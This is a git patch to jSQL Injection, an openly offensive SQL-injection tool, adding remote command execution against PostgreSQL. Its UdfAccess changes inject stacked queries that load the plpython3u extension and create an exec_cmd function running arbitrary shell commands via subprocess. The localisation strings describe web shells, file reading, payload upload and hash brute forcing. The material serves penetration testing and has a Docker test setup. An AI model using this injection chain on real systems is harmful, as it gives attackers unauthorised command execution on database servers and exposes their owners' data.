From e1f7962dd9adbd00e5acd5a3f7bcebd9ed71eac1 Mon Sep 17 00:00:00 2001 From: ron190 Date: Sun, 2 Feb 2025 15:53:36 +0100 Subject: [PATCH] Add RCE postgres via plpython3u - Add RCE postgres integration test - Fixes #95984 - Fixes #95985 --- .../model/accessible/CallableHttpHead.java | 1 - .../com/jsql/model/accessible/UdfAccess.java | 66 ++++++++++++++++++- .../com/jsql/model/bean/util/Interaction.java | 3 +- .../java/com/jsql/util/ConnectionUtil.java | 6 +- model/src/main/resources/i18n/jsql.properties | 2 +- .../test/java/com/test/AbstractTestSuite.java | 1 - .../postgres/PostgresExploitRceSuiteIT.java | 47 +++++++++++++ .../sqlite/SqliteExploitWebSuiteIT.java | 2 +- .../src/test/resources/docker/Dockerfile.lamp | 5 +- .../test/resources/docker/lamp/php/get-pg.php | 7 +- .../resources/docker/lamp/start-script.sh | 4 +- .../jsql/view/swing/action/ActionSaveTab.java | 8 +-- .../view/swing/dialog/translate/Language.java | 2 +- ...itRce.java => AddTabExploitRceOracle.java} | 6 +- .../interaction/AddTabExploitRcePostgres.java | 34 ++++++++++ .../view/swing/manager/ManagerExploit.java | 42 ++++++++---- .../panel/preferences/PanelTampering.java | 1 - .../com/jsql/view/swing/tab/TabResults.java | 29 ++++++-- ...{ExploitRce.java => ExploitRceOracle.java} | 14 ++-- .../swing/terminal/ExploitRcePostgres.java | 37 +++++++++++ 20 files changed, 265 insertions(+), 52 deletions(-) create mode 100644 model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java rename view/src/main/java/com/jsql/view/swing/interaction/{AddTabExploitRce.java => AddTabExploitRceOracle.java} (82%) create mode 100644 view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java rename view/src/main/java/com/jsql/view/swing/terminal/{ExploitRce.java => ExploitRceOracle.java} (64%) create mode 100644 view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java diff --git a/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java b/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java index 6822972cd2..e4aba11ca0 100644 --- a/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java +++ b/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java @@ -11,7 +11,6 @@ import org.apache.logging.log4j.Logger; import java.net.URI; -import java.net.http.HttpClient; import java.net.http.HttpRequest; import java.net.http.HttpRequest.BodyPublishers; import java.net.http.HttpResponse; diff --git a/model/src/main/java/com/jsql/model/accessible/UdfAccess.java b/model/src/main/java/com/jsql/model/accessible/UdfAccess.java index 8a7505bcdc..dc1d3b6ac9 100644 --- a/model/src/main/java/com/jsql/model/accessible/UdfAccess.java +++ b/model/src/main/java/com/jsql/model/accessible/UdfAccess.java @@ -53,7 +53,46 @@ public UdfAccess(InjectionModel injectionModel) { this.injectionModel = injectionModel; } - public void createExploitRce(ExploitMethod exploitMethod) throws JSqlException { + public void createExploitRcePostgres(ExploitMethod exploitMethod) throws JSqlException { + if (!Arrays.asList(ExploitMethod.AUTO, ExploitMethod.QUERY_BODY).contains(exploitMethod)) { + LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead"); + } + + this.injectionModel.injectWithoutIndex(";CREATE EXTENSION plpython3u;", "body#create-ext"); + var languages = this.getResult( + "select array_to_string(array(select lanname FROM pg_language),'')", + "body#find-ext" + ); + if (!languages.contains("plpython3u")) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: python extension not found"); + return; + } + + this.injectionModel.injectWithoutIndex(String.join( + "%0a", + "; CREATE OR REPLACE FUNCTION exec_cmd(cmd TEXT) RETURNS text AS%20$$", + "from subprocess import check_output as c", + "return c(cmd).decode()", + "$$%20LANGUAGE plpython3u;" + ), "body#create-func"); + var functions = this.getResult( + "SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' and routine_name = 'exec_cmd'", + "body#find-func" + ); + if (!functions.contains("exec_cmd")) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: function not found"); + return; + } + + LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: python function found"); + + var request = new Request(); + request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_POSTGRES); + request.setParameters(null, null); + this.injectionModel.sendToViews(request); + } + + public void createExploitRceOracle(ExploitMethod exploitMethod) throws JSqlException { if (!Arrays.asList(ExploitMethod.AUTO, ExploitMethod.QUERY_BODY).contains(exploitMethod)) { LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead"); } @@ -105,7 +144,7 @@ public void createExploitRce(ExploitMethod exploitMethod) throws JSqlException { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found"); var request = new Request(); - request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE); + request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_ORACLE); request.setParameters(null, null); this.injectionModel.sendToViews(request); } @@ -322,7 +361,7 @@ private boolean buildSysEval(String nameLibrary) throws JSqlException { return true; } - public String runCommandRce(String command, UUID uuidShell) { + public String runCommandRceOracle(String command, UUID uuidShell) { String result; try { result = this.getResult( @@ -344,6 +383,27 @@ public String runCommandRce(String command, UUID uuidShell) { return result; } + public String runCommandRcePostgres(String command, UUID uuidShell) { + String result; + try { + result = this.getResult( + String.format( + "SELECT exec_cmd('%s')||'%s'", + command.replace(StringUtils.SPACE, "%20"), // prevent SQL cleaning on system cmd: 'ls-l' instead of 'ls -l' + VendorYaml.TRAIL_SQL + ), + "rce#run-cmd" + ); + } catch (JSqlException e) { + result = "Command failure: " + e.getMessage() +"\nTry '"+ command.trim() +" 2>&1' to get a system error message.\n"; + } + var request = new Request(); + request.setMessage(Interaction.GET_EXPLOIT_RCE_RESULT); + request.setParameters(uuidShell, result); + this.injectionModel.sendToViews(request); + return result; + } + public String runCommand(String command, UUID uuidShell) { String result; try { diff --git a/model/src/main/java/com/jsql/model/bean/util/Interaction.java b/model/src/main/java/com/jsql/model/bean/util/Interaction.java index 030c887034..1808bc09e4 100644 --- a/model/src/main/java/com/jsql/model/bean/util/Interaction.java +++ b/model/src/main/java/com/jsql/model/bean/util/Interaction.java @@ -11,7 +11,8 @@ public enum Interaction { ADD_TAB_EXPLOIT_WEB("AddTabExploitWeb"), ADD_TAB_EXPLOIT_SQL("AddTabExploitSql"), ADD_TAB_EXPLOIT_UDF("AddTabExploitUdf"), - ADD_TAB_EXPLOIT_RCE("AddTabExploitRce"), + ADD_TAB_EXPLOIT_RCE_ORACLE("AddTabExploitRceOracle"), + ADD_TAB_EXPLOIT_RCE_POSTGRES("AddTabExploitRcePostgres"), CREATE_VALUES_TAB("CreateValuesTab"), CREATE_ANALYSIS_REPORT("CreateAnalysisReport"), diff --git a/model/src/main/java/com/jsql/util/ConnectionUtil.java b/model/src/main/java/com/jsql/util/ConnectionUtil.java index 016d426961..f350769920 100644 --- a/model/src/main/java/com/jsql/util/ConnectionUtil.java +++ b/model/src/main/java/com/jsql/util/ConnectionUtil.java @@ -6,14 +6,16 @@ import com.jsql.model.bean.util.Request; import com.jsql.model.exception.InjectionFailureException; import com.jsql.model.exception.JSqlException; -import com.jsql.model.exception.JSqlRuntimeException; import com.jsql.model.injection.method.AbstractMethodInjection; import org.apache.commons.lang3.StringUtils; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.io.IOException; -import java.net.*; +import java.net.Authenticator; +import java.net.CookieManager; +import java.net.PasswordAuthentication; +import java.net.URI; import java.net.http.HttpClient; import java.net.http.HttpClient.Version; import java.net.http.HttpHeaders; diff --git a/model/src/main/resources/i18n/jsql.properties b/model/src/main/resources/i18n/jsql.properties index 99f271d45e..a39b202d7b 100644 --- a/model/src/main/resources/i18n/jsql.properties +++ b/model/src/main/resources/i18n/jsql.properties @@ -1 +1 @@ -CONTEXT_MENU_SELECT_ALL = Select All CONTEXT_MENU_COPY = Copy CONTEXT_MENU_CLEAR = Clear CONTEXT_MENU_COPY_PAGE_URL = Copy page URL NEW_WINDOW_MENU = New Window NEW_WINDOW_START = Starting new window COLUMNS_CHECK_ALL = Check All COLUMNS_UNCHECK_ALL = Uncheck All THREAD_LOAD = Load THREAD_STOP = Stop THREAD_PAUSE = Pause THREAD_RESUME = Resume RELOAD_TABLES = Reload tables RELOAD_COLUMNS = Reload columns RENAME_NODE = Rename node ADDRESS_BAR_PLACEHOLDER = Enter address (e.g. http://127.0.0.1/index.php?key=value&injectMe=-1) # DATABASE DATABASE_TAB = Database DATABASE_TOOLTIP = Explore databases on server DATABASE_EMPTY = No database # ADMINPAGE ADMINPAGE_TAB = Admin page ADMINPAGE_TOOLTIP = Find admin pages on server ADMIN_PAGE_RUN_BUTTON_STOP = Stop ADMIN_PAGE_RUN_BUTTON_LABEL = Find ADMIN_PAGE_RUN_BUTTON_TOOLTIP = \ Find and browse common pages on server, getting admin access
\ e.g. Using address http://host/path/page.php then it checks for
\ host/path/<admin> and host/<admin> # FILE PRIVILEGE_LABEL = FILE privilege PRIVILEGE_TOOLTIP = \ Requires FILE privilege
\ Works only if FILE is granted to current database user FILE_TAB = Read file FILE_TOOLTIP = Read files on server using injection FILE_RUN_BUTTON_LABEL = Read FILE_RUN_BUTTON_TOOLTIP = \ Select common files to read by injection
\ Path must match a file existing on server FILE_RUN_BUTTON_STOP = Stop # EXPLOIT EXPLOIT_TAB = Exploit EXPLOIT_TOOLTIP = Create payload on server EXPLOIT_NETSHARE_LABEL = Path to your netshare folder (e.g \\\\127.0.0.1\\C$\\folder\\) EXPLOIT_NETSHARE_TOOLTIP = Folder path to your network share (direct connect)
\ Shell is put into your network share first, then server copies the shell from
\ your share to the destination (e.g. load_file(\\\\my_ip\\my_file) into '/server/path') SHELL_URL_LABEL = [Optional] URL for the shell folder SHELL_URL_TOOLTIP = \ Call the shell to another URL than current injection URL
\ Default calls the shell at same URL location as address bar.
\ Override to force another URL path (e.g. url rewriting, alias, redirection SHELL_RUN_BUTTON_LABEL = Create SHELL_RUN_BUTTON_TOOLTIP = Create payload on server
\ Gives access to system commands, SQL and upload UPLOAD_DIALOG_TEXT = Select a file to Upload SQL_SHELL_USERNAME_LABEL = [Optional] Database login SQL_SHELL_PASSWORD_LABEL = [Optional] Database password SQL_SHELL_USERNAME_TOOLTIP = \ Connect to shell with login
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. SQL_SHELL_PASSWORD_TOOLTIP = \ Connect to shell with password
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. EXPLOIT_UDF = [mysql] UDF cmd shell EXPLOIT_UDF_TOOLTIP = UDF shell to run system command on server via library
\ Requires stack query EXPLOIT_RCE = [oracle] RCE cmd shell EXPLOIT_RCE_TOOLTIP = RCE shell to run system command on server via java
\ Requires stack query, query body only EXPLOIT_WEB_MYSQL = [php mysql] Web cmd shell EXPLOIT_WEB_MYSQL_TOOLTIP = Web shell to run system command on server EXPLOIT_WEB_SQLITE = [php sqlite] Web cmd shell EXPLOIT_WEB_SQLITE_TOOLTIP = Web shell to run system command on server
\ Requires stack query, write access on destination folder, query body only EXPLOIT_SQL_MYSQL = [php mysql] SQL query shell EXPLOIT_SQL_MYSQL_TOOLTIP = SQL shell to run SQL command on server EXPLOIT_UPLOAD_MYSQL = [php mysql] Upload payload EXPLOIT_UPLOAD_MYSQL_TOOLTIP = Payload to upload a file on server EXPLOIT_UPLOAD_SQLITE = [php sqlite] Upload payload EXPLOIT_UPLOAD_SQLITE_TOOLTIP = Payload to upload a file on server MODE_AUTO = auto MODE_AUTO_TOOLTIP = Use query body then temp table if failing MODE_QUERY_BODY = query body MODE_QUERY_BODY_TOOLTIP = Create shell using single SQL query that contains body in hex
\ Limited to small payload when using GET MODE_TEMP_TABLE = temp table MODE_TEMP_TABLE_TOOLTIP = Create shell using table that contains body in hex
\ Requires stack queries to create table MODE_NETSHARE = netshare MODE_NETSHARE_TOOLTIP = Create shell using file loaded from your network share
\ Requires folder path like \\\\127.0.0.1\\C$\\folder\\ (e.g. local, CTF, public) # BRUTEFORCE BRUTEFORCE_TAB = Brute force BRUTEFORCE_TOOLTIP = Brute force hashes BRUTEFORCE_HASH_LABEL = Hash to brute force BRUTEFORCE_HASH_TOOLTIP = \ Hash to brute force
\ Password for admin pages and for database users are
\ usually hashed inside the database. BRUTEFORCE_HASH_TYPE_TOOLTIP = Type of hash
\ MD5 is commonly used to hash password of admin pages.
\ Password in MySQL is hashed differently (see table 'mysql.user'). BRUTEFORCE_LCASE_TOOLTIP = \ Lower case characters
\ Check if searched string contains any of following characters:
\ abcdefghijklmnopqrstuvwxyz BRUTEFORCE_UCASE_TOOLTIP = \ Upper case characters
\ Check if searched string contains any of following characters:
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ BRUTEFORCE_NUM_TOOLTIP = \ Numeric characters
\ Check if searched string contains any of following characters:
\ 0123456789 BRUTEFORCE_SPEC_TOOLTIP = \ Special characters
\ Check if searched string contains any of following characters:
\  ~`!@#$%^&*()_-+={}[]|\\;:'\"<.,>/? BRUTEFORCE_EXCLUDE_LABEL = Character(s) to exclude BRUTEFORCE_EXCLUDE_TOOLTIP = \ Exclude characters
\ Speed up process by excluding characters from the search. BRUTEFORCE_MIN_LABEL = Size min. BRUTEFORCE_MAX_LABEL = max. BRUTEFORCE_MIN_TOOLTIP = \ Minimum length of searched string
\ Speed up process by specifying the minimum length to search. BRUTEFORCE_MAX_TOOLTIP = \ Maximum length of searched string
\ Speed up process by specifying the maximum length to search. BRUTEFORCE_RUN_BUTTON_LABEL = Start BRUTEFORCE_RUN_BUTTON_TOOLTIP = \ Brute force provided hash to find original text
\ Hash the selected chars range and compare with provided BRUTEFORCE_RESULT = Result of brute force processing BRUTEFORCE_CHARACTER_RANGE = Select character range like lower case and numeric characters BRUTEFORCE_INCORRECT_MIN_MAX_LENGTH = Minimum length must be equal or lower than Maximum length BRUTEFORCE_STOP = Stop BRUTEFORCE_EMPTY_HASH = Missing hash BRUTEFORCE_CURRENT_STRING = Current string BRUTEFORCE_CURRENT_HASH = Current hash BRUTEFORCE_POSSIBILITIES = Number of possibilities BRUTEFORCE_CHECKED_HASHES = Checked hashes BRUTEFORCE_ESTIMATED = Estimated hashes left BRUTEFORCE_PERSECOND = Per second BRUTEFORCE_TRAVERSING_REMAINING = Traversing remaining BRUTEFORCE_DAYS = days BRUTEFORCE_HOURS = h BRUTEFORCE_MINUTES = min BRUTEFORCE_SECONDS = s BRUTEFORCE_PERCENT_DONE = Percent done BRUTEFORCE_ABORTED = Brute force aborted BRUTEFORCE_FOUND_HASH = Hash found BRUTEFORCE_HASH_NOT_FOUND = Hash not found # CODER CODER_TAB = Encoding CODER_TOOLTIP = Encode or decode a string CODER_INPUT = Type a text to convert CODER_RESULT = Result of conversion # SCAN SCANLIST_TAB = Batch scan SCANLIST_TOOLTIP = Test injection on multiple targets SCAN_RUN_BUTTON_STOP = Stop SCAN_RUN_BUTTON_LABEL = Start SCAN_RUN_BUTTON_TOOLTIP = Scan common public URL for injection # ADDRESSBAR FIELD_QUERYSTRING_TOOLTIP = \ Server URL
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside path or params (e.g. path?inject=*&q=).\
\ NTLM and Negotiate Authentication (NTLM is also set in Preferences)
\ Set NTLM and Negotiate authentication in URL.
\ E.g. http://domain\\user:pass@127.0.0.1/path?q=\ FIELD_REQUEST_TOOLTIP = \ Request parameters
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. inject=*&q=).\ FIELD_HEADER_TOOLTIP = \ Header parameters like Cookie, User-Agent and Referer
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. Inject:*\\r\\nQ:).
\ Set cookies with Cookie: key1=value1;key2=.
\ Define Basic authent with user:pass encoded in base64.
\ E.g. user:pass => dXNlcjpwYXNz, set Authorization: Basic dXNlcjpwYXNz\ METHOD_QUERYSTRING_TOOLTIP = Inject using URL parameters METHOD_REQUEST_TOOLTIP = Inject using Request parameters METHOD_HEADER_TOOLTIP = Inject using Header parameters METHOD_CUSTOM_TOOLTIP = Set user defined HTTP method.
\ A valid method is limited to chars:
\ !#$%&'*+-.^_`|~0123456789
\ abcdefghijklmnopqrstuvwxyz
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ\ BUTTON_START_TOOLTIP = Start injection BUTTON_STOP_TOOLTIP = Stop injection BUTTON_STOPPING_TOOLTIP = Stopping... BUTTON_ADVANCED = Advanced DIALOG_NEW_INJECTION_TITLE = New injection DIALOG_NEW_INJECTION_TEXT = Start a new injection? STRATEGY_TIME_TOOLTIP = \ Slowest and least reliable method
\ Create 5s delay when query statement is false.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_BLIND_TOOLTIP = \ Slow and reliable method
\ Create response A when query statement is true, response B otherwise.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_MULTIBIT_TOOLTIP = \ Slow and reliable method 3 times faster than Blind
\ Require 8 pages mapped to distinct id.
\ Read multiple bits for each character's ASCII code (3 URL calls). STRATEGY_ERROR_TOOLTIP = \ Fast and accurate method
\ Read data directly from source page. STRATEGY_STACK_TOOLTIP = \ Fastest and accurate method though less common
\ Read large data directly from source page. STRATEGY_UNION_TOOLTIP = \ Fastest and accurate method
\ Read large data directly from source page. # MENUBAR MENUBAR_COMMUNITY = Community MENUBAR_COMMUNITY_REPORTISSUE = Report issue or bug MENUBAR_COMMUNITY_HELPTRANSLATE = I help translate jSQL into MENUBAR_COMMUNITY_ANOTHERLANGUAGE = another language... MENUBAR_HELP = Help MENUBAR_HELP_UPDATE = Check for Updates MENUBAR_HELP_ABOUT = About jSQL Injection MENUBAR_APPEARANCE = Appearance MENUBAR_THEMES = Themes MENUBAR_WINDOWS = Windows MENUBAR_LANGUAGE = Language MENUBAR_SQL_ENGINE = SQL Engine MENUBAR_VIEW = Show View MENUBAR_PANEL = Show Consoles MENUBAR_PREFERENCES = Preferences MENUBAR_EDIT = Edit MENUBAR_FILE = File MENUBAR_FILE_EXIT = Exit MENUBAR_FILE_SAVETABAS = Save Tab As... SAVE_TAB_CONFIRM_TITLE = Confirm Save As SAVE_TAB_CONFIRM_LABEL = already exists.\nDo you want to replace it ? TRANSLATION_TEXT = Contribute and translate parts of jSQL Injection into %s
\ Help the community and translate some buttons, menus, tabs and tooltips into %s,\ then click on Send to forward your changes to the developer on GitHub.
",\ E.g. for French, change CONTEXT_MENU_COPY = Copy to CONTEXT_MENU_COPY = Copier,\ then click on Send. The list only displays what needs to be translated \ and is updated as soon as the developer processes your request.\ TRANSLATION_SEND = Send TRANSLATION_TITLE = Translate to TRANSLATION_PLACEHOLDER = Text remaining to translate TRANSLATION_PROGRESS = translated into # CONSOLE CONSOLE_MAIN_LABEL = Console CONSOLE_MAIN_TOOLTIP = General information CONSOLE_CHUNK_LABEL = Chunk CONSOLE_CHUNK_TOOLTIP = Raw data extracted CONSOLE_BINARY_LABEL = Binary CONSOLE_BINARY_TOOLTIP = Blind/Time chars extracted CONSOLE_NETWORK_LABEL = Network CONSOLE_NETWORK_TOOLTIP = URL calls logs CONSOLE_JAVA_LABEL = Java CONSOLE_JAVA_TOOLTIP = Java thrown exception NETWORK_TAB_URL_LABEL = URL NETWORK_TAB_HEADERS_LABEL = Headers NETWORK_TAB_PARAMS_LABEL = Request NETWORK_TAB_RESPONSE_LABEL = Response NETWORK_TAB_SOURCE_LABEL = Source NETWORK_TAB_PREVIEW_LABEL = Preview NETWORK_LINE_PLACEHOLDER_URL = Request URL NETWORK_LINE_PLACEHOLDER_HEADERS = Request headers NETWORK_LINE_PLACEHOLDER_REQUEST = Request body NETWORK_LINE_PLACEHOLDER_RESPONSE = Response headers NETWORK_LINE_PLACEHOLDER_SOURCE = Page source NETWORK_LINE_PLACEHOLDER_PREVIEW = Page rendering NETWORK_TAB_URL_COLUMN = URL NETWORK_TAB_SIZE_COLUMN = Size # LOGGER LOG_START_INJECTION = Starting new injection LOG_CONNECTION_TEST = Connection test... LOG_USING_INSERTION_CHARACTER = Using character insertion LOG_USING_DATABASE_TYPE = Using LOG_DATABASE_TYPE_FORCED_BY_USER = Database forced to LOG_DATABASE_TYPE_NOT_FOUND = Database unknown, forcing to LOG_VULNERABLE = Vulnerable to LOG_CHECKING_STRATEGY = Checking strategy LOG_CHECKING = Checking LOG_USING_STRATEGY = Using strategy LOG_FETCHING_INFORMATIONS = Fetching metadata... LOG_FETCHING_DATABASES = Fetching databases... LOG_DONE = Done LOG_DB_METADATA_INCORRECT = Incorrect or incomplete data LOG_DB_METADATA_WARN = Processing but failure is expected LOG_LIST_VALUES_INCOMPLETE = Incomplete row found LOG_LIST_VALUES_TOO_LONG = Row too long at # LOG_ADMIN_UNKNOWN_PROTOCOL = Unknown URL protocol LOG_ADMIN_NO_PROTOCOL = Undefined URL protocol, forcing to [http://] LOG_I18N_TEXT_NOT_FOUND = Language file not found, text to translate loaded from local LOG_IP_ADDRESS_CHECK = Checking ip address... LOG_IP_ADDRESS_IS = Your public IP address is # LIST LIST_NEW_VALUE = New Value(s)... LIST_CUT = Cut LIST_PASTE = Paste LIST_DELETE = Delete LIST_RESTORE_DEFAULT = Restore default LIST_ADD_VALUE_OK = Ok LIST_ADD_VALUE_CANCEL = Cancel LIST_ADD_VALUE_TITLE = Add Value(s) LIST_ADD_VALUE_LABEL = Add new value(s) to the list, a value per line.
Or you can copy/paste directly from your clipboard to the list. LIST_EXPORT_TITLE = Export... LIST_EXPORT_CONFIRM_LABEL = already exists.\nDo you want to replace it? LIST_EXPORT_CONFIRM_TITLE = Confirm Export LIST_IMPORT_CONFIRM_REPLACE = Replace LIST_IMPORT_CONFIRM_ADD = Add LIST_IMPORT_CONFIRM_LABEL = Replace list or add to current location? LIST_IMPORT_CONFIRM_TITLE = Import... LIST_IMPORT_ERROR_TITLE = Import Error LIST_IMPORT_ERROR_LABEL = Unsupported file format, use text file only # SQLENGINE SQLENGINE_STANDARD = Default SQLENGINE_ZIP = Zip SQLENGINE_DIOS = Dios SQLENGINE_STRUCTURE = Structure SQLENGINE_DATABASES = Database SQLENGINE_TABLES = Tables SQLENGINE_COLUMNS = Columns SQLENGINE_ROWS = Rows SQLENGINE_FIELD = Field SQLENGINE_FIELDS_SEPARATOR = Fields Separator SQLENGINE_METADATA = Metadata SQLENGINE_STRATEGY = Strategy SQLENGINE_STACK = Stack SQLENGINE_UNION = Union SQLENGINE_ERROR = Error SQLENGINE_BOOLEAN = Binary SQLENGINE_FINGERPRINTING = Fingerprint SQLENGINE_CONFIGURATION = Configuration SQLENGINE_ORDER_BY = Order by SQLENGINE_CHARACTERS_SLIDINGWINDOW = Char Sliding Window SQLENGINE_ROWS_SLIDINGWINDOW = Rows Sliding Window SQLENGINE_CAPACITY = Capacity SQLENGINE_CALIBRATOR = Calibrator SQLENGINE_FAILSAFE = Failsafe SQLENGINE_END_COMMENT = End comment SQLENGINE_LIMIT_START_INDEX = Limit start index SQLENGINE_FILE = File # OTHER UPDATE_EXCEPTION = \ An error occurred while checking updates, download the latest version from official website:\n\ https://github.com/ron190/jsql-injection/releases UPDATE_NEW_VERSION = A new version of jSQL Injection is available at https://github.com/ron190/jsql-injection/releases UPDATE_UPTODATE = jSQL Injection is up-to-date UPDATE_LOADING = Checking updates... ABOUT_WINDOW_TITLE = About ABOUT_WEBPAGE = Webpage ABOUT_CLOSE = Close PREFERENCES_PROXY = Proxy PREFERENCES_USEPROXY = Use a proxy PREFERENCES_PROXYADDRESS = Proxy address PREFERENCES_PROXYPORT = Proxy port PREFERENCES_AUTHENT = Authentication PREFERENCES_AUTHENT_USER = Username PREFERENCES_AUTHENT_PASS = Password PREFERENCES_CHECKUPDATE = Check update at startup PREFERENCES_REPORT_EXCEPTIONS = Report unhandled exceptions PREFERENCES_FOLLOW_REDIRECTIONS = Follow HTTP redirections PREFERENCES_CHECKIP = Check your IP PREFERENCES_APPLY = Apply \ No newline at end of file +CONTEXT_MENU_SELECT_ALL = Select All CONTEXT_MENU_COPY = Copy CONTEXT_MENU_CLEAR = Clear CONTEXT_MENU_COPY_PAGE_URL = Copy page URL NEW_WINDOW_MENU = New Window NEW_WINDOW_START = Starting new window COLUMNS_CHECK_ALL = Check All COLUMNS_UNCHECK_ALL = Uncheck All THREAD_LOAD = Load THREAD_STOP = Stop THREAD_PAUSE = Pause THREAD_RESUME = Resume RELOAD_TABLES = Reload tables RELOAD_COLUMNS = Reload columns RENAME_NODE = Rename node ADDRESS_BAR_PLACEHOLDER = Enter address (e.g. http://127.0.0.1/index.php?key=value&injectMe=-1) # DATABASE DATABASE_TAB = Database DATABASE_TOOLTIP = Explore databases on server DATABASE_EMPTY = No database # ADMINPAGE ADMINPAGE_TAB = Admin page ADMINPAGE_TOOLTIP = Find admin pages on server ADMIN_PAGE_RUN_BUTTON_STOP = Stop ADMIN_PAGE_RUN_BUTTON_LABEL = Find ADMIN_PAGE_RUN_BUTTON_TOOLTIP = \ Find and browse common pages on server, getting admin access
\ e.g. Using address http://host/path/page.php then it checks for
\ host/path/<admin> and host/<admin> # FILE PRIVILEGE_LABEL = FILE privilege PRIVILEGE_TOOLTIP = \ Requires FILE privilege
\ Works only if FILE is granted to current database user FILE_TAB = Read file FILE_TOOLTIP = Read files on server using injection FILE_RUN_BUTTON_LABEL = Read FILE_RUN_BUTTON_TOOLTIP = \ Select common files to read by injection
\ Path must match a file existing on server FILE_RUN_BUTTON_STOP = Stop # EXPLOIT EXPLOIT_TAB = Exploit EXPLOIT_TOOLTIP = Create payload on server EXPLOIT_NETSHARE_LABEL = Path to your netshare folder (e.g \\\\127.0.0.1\\C$\\folder\\) EXPLOIT_NETSHARE_TOOLTIP = Folder path to your network share (direct connect)
\ Shell is put into your network share first, then server copies the shell from
\ your share to the destination (e.g. load_file(\\\\my_ip\\my_file) into '/server/path') SHELL_URL_LABEL = [Optional] URL for the shell folder SHELL_URL_TOOLTIP = \ Call the shell to another URL than current injection URL
\ Default calls the shell at same URL location as address bar.
\ Override to force another URL path (e.g. url rewriting, alias, redirection SHELL_RUN_BUTTON_LABEL = Create SHELL_RUN_BUTTON_TOOLTIP = Create payload on server
\ Gives access to system commands, SQL and upload UPLOAD_DIALOG_TEXT = Select a file to Upload SQL_SHELL_USERNAME_LABEL = [Optional] Database login SQL_SHELL_PASSWORD_LABEL = [Optional] Database password SQL_SHELL_USERNAME_TOOLTIP = \ Connect to shell with login
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. SQL_SHELL_PASSWORD_TOOLTIP = \ Connect to shell with password
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. EXPLOIT_UDF_MYSQL = [mysql] UDF cmd shell EXPLOIT_UDF_MYSQL_TOOLTIP = UDF shell to run system command on server via library
\ Requires stack query EXPLOIT_RCE_ORACLE = [oracle] RCE cmd shell EXPLOIT_RCE_ORACLE_TOOLTIP = RCE shell to run system command on server via java
\ Requires stack query, query body only EXPLOIT_RCE_POSTGRES = [postgres] RCE cmd shell EXPLOIT_RCE_POSTGRES_TOOLTIP = RCE shell to run system command on server via python extension
\ Requires stack query, package postgresql-plpython3, query body only EXPLOIT_WEB_MYSQL = [php mysql] Web cmd shell EXPLOIT_WEB_MYSQL_TOOLTIP = Web shell to run system command on server EXPLOIT_WEB_SQLITE = [php sqlite] Web cmd shell EXPLOIT_WEB_SQLITE_TOOLTIP = Web shell to run system command on server
\ Requires stack query, write access on destination folder, query body only EXPLOIT_SQL_MYSQL = [php mysql] SQL query shell EXPLOIT_SQL_MYSQL_TOOLTIP = SQL shell to run SQL command on server EXPLOIT_UPLOAD_MYSQL = [php mysql] Upload payload EXPLOIT_UPLOAD_MYSQL_TOOLTIP = Payload to upload a file on server EXPLOIT_UPLOAD_SQLITE = [php sqlite] Upload payload EXPLOIT_UPLOAD_SQLITE_TOOLTIP = Payload to upload a file on server MODE_AUTO = auto MODE_AUTO_TOOLTIP = Use query body then temp table if failing MODE_QUERY_BODY = query body MODE_QUERY_BODY_TOOLTIP = Create shell using single SQL query that contains body in hex
\ Limited to small payload when using GET MODE_TEMP_TABLE = temp table MODE_TEMP_TABLE_TOOLTIP = Create shell using table that contains body in hex
\ Requires stack queries to create table MODE_NETSHARE = netshare MODE_NETSHARE_TOOLTIP = Create shell using file loaded from your network share
\ Requires folder path like \\\\127.0.0.1\\C$\\folder\\ (e.g. local, CTF, public) # BRUTEFORCE BRUTEFORCE_TAB = Brute force BRUTEFORCE_TOOLTIP = Brute force hashes BRUTEFORCE_HASH_LABEL = Hash to brute force BRUTEFORCE_HASH_TOOLTIP = \ Hash to brute force
\ Password for admin pages and for database users are
\ usually hashed inside the database. BRUTEFORCE_HASH_TYPE_TOOLTIP = Type of hash
\ MD5 is commonly used to hash password of admin pages.
\ Password in MySQL is hashed differently (see table 'mysql.user'). BRUTEFORCE_LCASE_TOOLTIP = \ Lower case characters
\ Check if searched string contains any of following characters:
\ abcdefghijklmnopqrstuvwxyz BRUTEFORCE_UCASE_TOOLTIP = \ Upper case characters
\ Check if searched string contains any of following characters:
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ BRUTEFORCE_NUM_TOOLTIP = \ Numeric characters
\ Check if searched string contains any of following characters:
\ 0123456789 BRUTEFORCE_SPEC_TOOLTIP = \ Special characters
\ Check if searched string contains any of following characters:
\  ~`!@#$%^&*()_-+={}[]|\\;:'\"<.,>/? BRUTEFORCE_EXCLUDE_LABEL = Character(s) to exclude BRUTEFORCE_EXCLUDE_TOOLTIP = \ Exclude characters
